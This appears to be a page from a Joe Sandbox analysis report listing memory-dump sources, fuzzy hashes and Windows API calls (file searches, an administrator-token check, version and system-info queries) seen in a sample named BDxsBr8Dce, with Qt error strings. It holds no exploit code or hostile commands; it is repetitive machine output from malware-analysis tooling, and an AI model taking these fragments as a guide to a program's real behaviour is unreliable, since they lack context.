                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$FirstNext
                                                                                                            • String ID: .lnk$\\?\UNC\
                                                                                                            • API String ID: 1690352074-1314987491
                                                                                                            • Opcode ID: e60bca13b0b1e2a987ed0af8290478756c5f309bcf7980c7837830c13a7e4498
                                                                                                            • Instruction ID: 63ea2ff97df934ebfae97d4575077c981024a943d7ea9f91a099c2800c40f108
                                                                                                            • Opcode Fuzzy Hash: e60bca13b0b1e2a987ed0af8290478756c5f309bcf7980c7837830c13a7e4498
                                                                                                            • Instruction Fuzzy Hash: 93D1D170508341ABEB25DF24C854BAEBBE4BF85324F104A4DF9E9972D2D734E548CB92
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(01514B34,00000000,00000001,012608F4,00000010,?,00000000,?,?,?,?,?,?,?,?,008A675A), ref: 008A6803
                                                                                                            Strings
                                                                                                            • QWinTaskbarButton: qIID_ITaskbarList4 was not created: %#010x, %s., xrefs: 008A686E
                                                                                                            • QWinTaskbarButton: qIID_ITaskbarList4 was not initialized: %#010x, %s., xrefs: 008A6981
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance
                                                                                                            • String ID: QWinTaskbarButton: qIID_ITaskbarList4 was not created: %#010x, %s.$QWinTaskbarButton: qIID_ITaskbarList4 was not initialized: %#010x, %s.
                                                                                                            • API String ID: 542301482-2777225030
                                                                                                            • Opcode ID: 68bdf5d1f2c47c0e509c6eeadf25c99aff2e45365b2a353a712dfc5ddad79234
                                                                                                            • Instruction ID: 83af2bf011eccd35b981af819aa44515797e965fbb90cc5c9e9f4b3f7f8dc8fa
                                                                                                            • Opcode Fuzzy Hash: 68bdf5d1f2c47c0e509c6eeadf25c99aff2e45365b2a353a712dfc5ddad79234
                                                                                                            • Instruction Fuzzy Hash: 8E61B5702013019FEB28CF18C851B2A73A5FF86724F1C461DF96ADB6D4EB74AC198B52
                                                                                                            APIs
                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008058FC
                                                                                                            • CheckTokenMembership.ADVAPI32(00000000,00000000,00000000), ref: 00805928
                                                                                                            • FreeSid.ADVAPI32(?), ref: 0080593A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 3429775523-0
                                                                                                            • Opcode ID: 6e667e8ff040f59d2760c520d64297d7bd85217d036b60228afb927c4fc3b0d9
                                                                                                            • Instruction ID: 0cf3ec9d4c27e543e4aef6795cb8cc6f0974379076543dd34f2e63b601507683
                                                                                                            • Opcode Fuzzy Hash: 6e667e8ff040f59d2760c520d64297d7bd85217d036b60228afb927c4fc3b0d9
                                                                                                            • Instruction Fuzzy Hash: 9D017871618301ABEB54EF64C84AB2F77E4BF94B01F81482CF186861D0E778E948DB97
                                                                                                            Strings
                                                                                                            • QApplication: Object event filter cannot be in a different thread., xrefs: 008F3E6D
                                                                                                            • QApplication::notify: Unexpected null receiver, xrefs: 008F38E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: QApplication: Object event filter cannot be in a different thread.$QApplication::notify: Unexpected null receiver
                                                                                                            • API String ID: 0-1865488698
                                                                                                            • Opcode ID: 6f1e005926e0bebc8394815ada5e8246ab40c999926ea3b5f9540f087d459319
                                                                                                            • Instruction ID: 0d876ae2bdb912b72147c96b7de10d3ac926504a183e652cbdfd7b0219906157
                                                                                                            • Opcode Fuzzy Hash: 6f1e005926e0bebc8394815ada5e8246ab40c999926ea3b5f9540f087d459319
                                                                                                            • Instruction Fuzzy Hash: 2732B0316046489FCB24DF38C450BBAB7E4FF95344F04852EEA95CB291EB31EA49CB52
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,00000001,?,00000001,EA29BAA6,?,?,?,00000000,01141CC8,000000FF,01088463), ref: 01088BB8
                                                                                                            • FindClose.KERNEL32(00000000,?,00000001,?,00000001,EA29BAA6,?,?,?,00000000,01141CC8,000000FF,01088463,?,?,?), ref: 01088BC4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 2295610775-0
                                                                                                            • Opcode ID: 251a456b39584057e9c96dc1d8df3d5b850d766c0e586f9de41ed7d8587d04c0
                                                                                                            • Instruction ID: a0be1ab565b984ad9aba5ee469ed1a152e2a3c1cdaabc45b0ac49181622eb996
                                                                                                            • Opcode Fuzzy Hash: 251a456b39584057e9c96dc1d8df3d5b850d766c0e586f9de41ed7d8587d04c0
                                                                                                            • Instruction Fuzzy Hash: D82146702083009BE745EB18CC12FAA37D4FF85724F804A5EF6E6972D1DB289909CB16
                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 00F71777
                                                                                                            • GetVersionExW.KERNEL32(?,?), ref: 00F71780
                                                                                                              • Part of subcall function 00F702D0: GetProcAddress.KERNEL32(00000000,GetFileVersionInfoSizeW), ref: 00F703A9
                                                                                                              • Part of subcall function 00F70190: VerSetConditionMask.KERNEL32 ref: 00F701C4
                                                                                                              • Part of subcall function 00F70190: VerSetConditionMask.KERNEL32 ref: 00F701CC
                                                                                                              • Part of subcall function 00F70190: _memset.LIBCMT ref: 00F70209
                                                                                                              • Part of subcall function 00F70190: VerifyVersionInfoW.KERNEL32(?,0000000A,00000000), ref: 00F70230
                                                                                                              • Part of subcall function 00F70190: VerifyVersionInfoW.KERNEL32(?,0000000A,00000000), ref: 00F7024B
                                                                                                              • Part of subcall function 00F70190: VerSetConditionMask.KERNEL32 ref: 00F7026E
                                                                                                              • Part of subcall function 00F70190: VerSetConditionMask.KERNEL32 ref: 00F70276
                                                                                                              • Part of subcall function 00F70190: VerSetConditionMask.KERNEL32 ref: 00F7027E
                                                                                                              • Part of subcall function 00F70190: VerifyVersionInfoW.KERNEL32(?,0000000B,00000000), ref: 00F7028D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConditionMask$Version$InfoVerify$_memset$AddressProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 316574600-0
                                                                                                            • Opcode ID: 18b339c0c3a08ebc6aa30c068f53e6983aa3d2603defa987b2fcaf878785a746
                                                                                                            • Instruction ID: 9830657f9adcd4a922e5b0fb877eaa190c9d5639322f088aac5cd158109246ff
                                                                                                            • Opcode Fuzzy Hash: 18b339c0c3a08ebc6aa30c068f53e6983aa3d2603defa987b2fcaf878785a746
                                                                                                            • Instruction Fuzzy Hash: F4F0B4B08007119FE7319F18E805B87B7E4AF1131AF00C92DE08E97551E775A54DCB93
                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,011162AF,?,?,?,00000000), ref: 011126C9
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 011126D2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: cb699620a7a488c16f91658d50d3fa999266bde9f1b1be4a4afc6abd2ce31b17
                                                                                                            • Instruction ID: 63133e3cab3fcc6f224b7504017ee4696c2009f87c26cba7a244a559a4a9a2f2
                                                                                                            • Opcode Fuzzy Hash: cb699620a7a488c16f91658d50d3fa999266bde9f1b1be4a4afc6abd2ce31b17
                                                                                                            • Instruction Fuzzy Hash: D8B0923204820CABCB942BD2E809B483F6AEB04FD2F408020F62D44064DBE354908B91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread_malloc
                                                                                                            • String ID: #
                                                                                                            • API String ID: 443577368-1885708031
                                                                                                            • Opcode ID: f83cd5d728f7c0bb008ab312ee867523a3ef4b6388c21dfaff82e7a364b4e0b6
                                                                                                            • Instruction ID: 8b97272f53336fd32fa2389aa3e2449ed23730e88efff881d88f4d123e44fbcc
                                                                                                            • Opcode Fuzzy Hash: f83cd5d728f7c0bb008ab312ee867523a3ef4b6388c21dfaff82e7a364b4e0b6
                                                                                                            • Instruction Fuzzy Hash: 7642BFF06053428FE760EF68C9C434ABBD0AB94724F180B6DE9E55B2E1D7B4D948C792
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32 ref: 00F935FE
                                                                                                              • Part of subcall function 00F95D10: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F95E00
                                                                                                              • Part of subcall function 00F95D10: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F95E1E
                                                                                                              • Part of subcall function 0110379E: _malloc.LIBCMT ref: 011037B6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$LocalTime_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 4179089160-0
                                                                                                            • Opcode ID: c52095f90da467a390a68999dbd9f15628a0d9fec1c6582986c0a9ee027ae511
                                                                                                            • Instruction ID: 7dd709ba470f3b42c5727a50707b83a2e0ab218a36cf194ea770260b6eea0ee1
                                                                                                            • Opcode Fuzzy Hash: c52095f90da467a390a68999dbd9f15628a0d9fec1c6582986c0a9ee027ae511
                                                                                                            • Instruction Fuzzy Hash: 034147B15087019FD354DF29C414B6ABBF8FB98714F404A1EF89986680EB79EA44CB92
                                                                                                            APIs
                                                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00FE5287
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 31276548-0
                                                                                                            • Opcode ID: 10129de8fc651b45e8a050858fe8badce887f888726e7e79d64b17f1f28c2b88
                                                                                                            • Instruction ID: 79bacaafc85075cb4ff135d0205e289308136b0521aa18551db49fb66e6bec85
                                                                                                            • Opcode Fuzzy Hash: 10129de8fc651b45e8a050858fe8badce887f888726e7e79d64b17f1f28c2b88
                                                                                                            • Instruction Fuzzy Hash: 47B09B7440C201C7C518EB55D5C540677E46B48100F840424F4D5C6104D225D5DC8757
                                                                                                            Strings
                                                                                                            • QLayout::activate: %s "%s" does not have a main widget, xrefs: 00918606
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
